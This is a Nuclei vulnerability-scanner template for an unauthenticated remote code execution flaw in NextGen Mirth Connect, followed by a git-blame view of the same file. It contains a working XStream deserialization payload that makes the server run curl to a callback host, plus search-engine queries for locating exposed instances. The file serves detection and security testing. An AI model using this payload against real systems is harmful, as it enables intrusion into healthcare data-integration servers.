nuclei-templates/http/cves/2023/CVE-2023-37679.yaml

id: CVE-2023-37679

info:
  name: NextGen Mirth Connect - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability
  reference:
    - https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-37679
    - http://mirth.com
    - http://nextgen.com
    - http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-37679
    cwe-id: CWE-77
    epss-score: 0.07052
    epss-percentile: 0.9396
    cpe: cpe:2.3:a:nextgen:mirth_connect:4.3.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: nextgen
    product: mirth_connect
    shodan-query:
      - title:"mirth connect administrator"
      - http.title:"mirth connect administrator"
    fofa-query: title="mirth connect administrator"
    google-query: intitle:"mirth connect administrator"
  tags: packetstorm,cve2023,cve,nextgen,rce

http:
  - raw:
      - |
        GET /api/server/version HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: OpenAPI
      - |
        POST /api/users HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: OpenAPI
        Content-Type: application/xml

        <sorted-set>
            <string>foo</string>
            <dynamic-proxy>
                <interface>java.lang.Comparable</interface>
                <handler class="java.beans.EventHandler">
                    <target class="java.lang.ProcessBuilder">
                        <command>
                            <string>curl</string>
                            <string>http://{{interactsh-url}}/</string>
                        </command>
                    </target>
                    <action>start</action>
                </handler>
            </dynamic-proxy>
        </sorted-set>

    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "<4.4.1")'
          - 'contains(interactsh_protocol, "dns")'
          - 'status_code_1 == 200 && status_code_2 == 500'
        condition: and

    extractors:
      - type: regex
        part: body_1
        name: version
        group: 1
        regex:
          - '(.*)'
        internal: true
# digest: 4a0a0047304502210090fa6ea3074ddefab156454bac75d98ecf2afccb77df469b6769e05ce26989a402201089a4c18eb1d115bde79688a15cbd51dacae795376dc2c19bde505d32158c91:922c64590222798bb761d5b6d8e72950
Update and rename CVE-2023-43208.yaml to CVE-2023-37679.yaml 2023-10-26 06:42:18 +00:00			`id: CVE-2023-37679`
Update CVE-2023-43208.yaml 2023-10-25 18:13:45 +00:00
Added NextGen Mirth Connect Remote Code Execution Vulnerability (CVE-2023-43208) 2023-10-25 16:30:54 +00:00			`info:`
Update CVE-2023-43208.yaml 2023-10-25 18:13:45 +00:00			`name: NextGen Mirth Connect - Remote Code Execution`
Added NextGen Mirth Connect Remote Code Execution Vulnerability (CVE-2023-43208) 2023-10-25 16:30:54 +00:00			`author: iamnoooob,rootxharsh,pdresearch`
			`severity: critical`
			`description: \|`
			`Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability`
			`reference:`
			`- https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/`
Update and rename CVE-2023-43208.yaml to CVE-2023-37679.yaml 2023-10-26 06:42:18 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2023-37679`
TemplateMan Update [Thu Oct 26 18:00:24 UTC 2023] :robot: 2023-10-26 18:00:24 +00:00			`- http://mirth.com`
			`- http://nextgen.com`
product/queries updated 2024-05-31 19:23:20 +00:00			`- http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html`
Update CVE-2023-43208.yaml 2023-10-25 18:13:45 +00:00			`classification:`
TemplateMan Update [Thu Oct 26 18:00:24 UTC 2023] :robot: 2023-10-26 18:00:24 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
Update and rename CVE-2023-43208.yaml to CVE-2023-37679.yaml 2023-10-26 06:42:18 +00:00			`cve-id: CVE-2023-37679`
TemplateMan Update [Thu Oct 26 18:00:24 UTC 2023] :robot: 2023-10-26 18:00:24 +00:00			`cwe-id: CWE-77`
product/queries updated 2024-05-31 19:23:20 +00:00			`epss-score: 0.07052`
			`epss-percentile: 0.9396`
TemplateMan Update [Thu Oct 26 18:00:24 UTC 2023] :robot: 2023-10-26 18:00:24 +00:00			`cpe: cpe:2.3:a:nextgen:mirth_connect:4.3.0:::::::*`
Update CVE-2023-43208.yaml 2023-10-25 18:13:45 +00:00			`metadata:`
			`verified: true`
TemplateMan Update [Thu Oct 26 18:00:24 UTC 2023] :robot: 2023-10-26 18:00:24 +00:00			`max-request: 2`
			`vendor: nextgen`
			`product: mirth_connect`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`shodan-query:`
			`- title:"mirth connect administrator"`
			`- http.title:"mirth connect administrator"`
product/queries updated 2024-05-31 19:23:20 +00:00			`fofa-query: title="mirth connect administrator"`
			`google-query: intitle:"mirth connect administrator"`
			`tags: packetstorm,cve2023,cve,nextgen,rce`
Added NextGen Mirth Connect Remote Code Execution Vulnerability (CVE-2023-43208) 2023-10-25 16:30:54 +00:00
			`http:`
			`- raw:`
			`- \|`
			`GET /api/server/version HTTP/1.1`
			`Host: {{Hostname}}`
			`X-Requested-With: OpenAPI`
			`- \|`
			`POST /api/users HTTP/1.1`
			`Host: {{Hostname}}`
			`X-Requested-With: OpenAPI`
			`Content-Type: application/xml`

Updated CVE-2023-43208.yaml with XStream RCE Gadget 2023-10-25 18:04:51 +00:00			`<sorted-set>`
			`<string>foo</string>`
			`<dynamic-proxy>`
			`<interface>java.lang.Comparable</interface>`
			`<handler class="java.beans.EventHandler">`
			`<target class="java.lang.ProcessBuilder">`
			`<command>`
Update and rename CVE-2023-43208.yaml to CVE-2023-37679.yaml 2023-10-26 06:42:18 +00:00			`<string>curl</string>`
Updated CVE-2023-43208.yaml with XStream RCE Gadget 2023-10-25 18:04:51 +00:00			`<string>http://{{interactsh-url}}/</string>`
			`</command>`
			`</target>`
			`<action>start</action>`
			`</handler>`
			`</dynamic-proxy>`
			`</sorted-set>`
Added NextGen Mirth Connect Remote Code Execution Vulnerability (CVE-2023-43208) 2023-10-25 16:30:54 +00:00
Update CVE-2023-43208.yaml 2023-10-25 18:13:45 +00:00			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'compare_versions(version, "<4.4.1")'`
			`- 'contains(interactsh_protocol, "dns")'`
			`- 'status_code_1 == 200 && status_code_2 == 500'`
			`condition: and`

Added NextGen Mirth Connect Remote Code Execution Vulnerability (CVE-2023-43208) 2023-10-25 16:30:54 +00:00			`extractors:`
			`- type: regex`
			`part: body_1`
Update CVE-2023-43208.yaml 2023-10-25 18:13:45 +00:00			`name: version`
Added NextGen Mirth Connect Remote Code Execution Vulnerability (CVE-2023-43208) 2023-10-25 16:30:54 +00:00			`group: 1`
			`regex:`
			`- '(.*)'`
Update CVE-2023-43208.yaml 2023-10-25 18:13:45 +00:00			`internal: true`
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot: 2024-06-08 16:02:17 +00:00			`# digest: 4a0a0047304502210090fa6ea3074ddefab156454bac75d98ecf2afccb77df469b6769e05ce26989a402201089a4c18eb1d115bde79688a15cbd51dacae795376dc2c19bde505d32158c91:922c64590222798bb761d5b6d8e72950`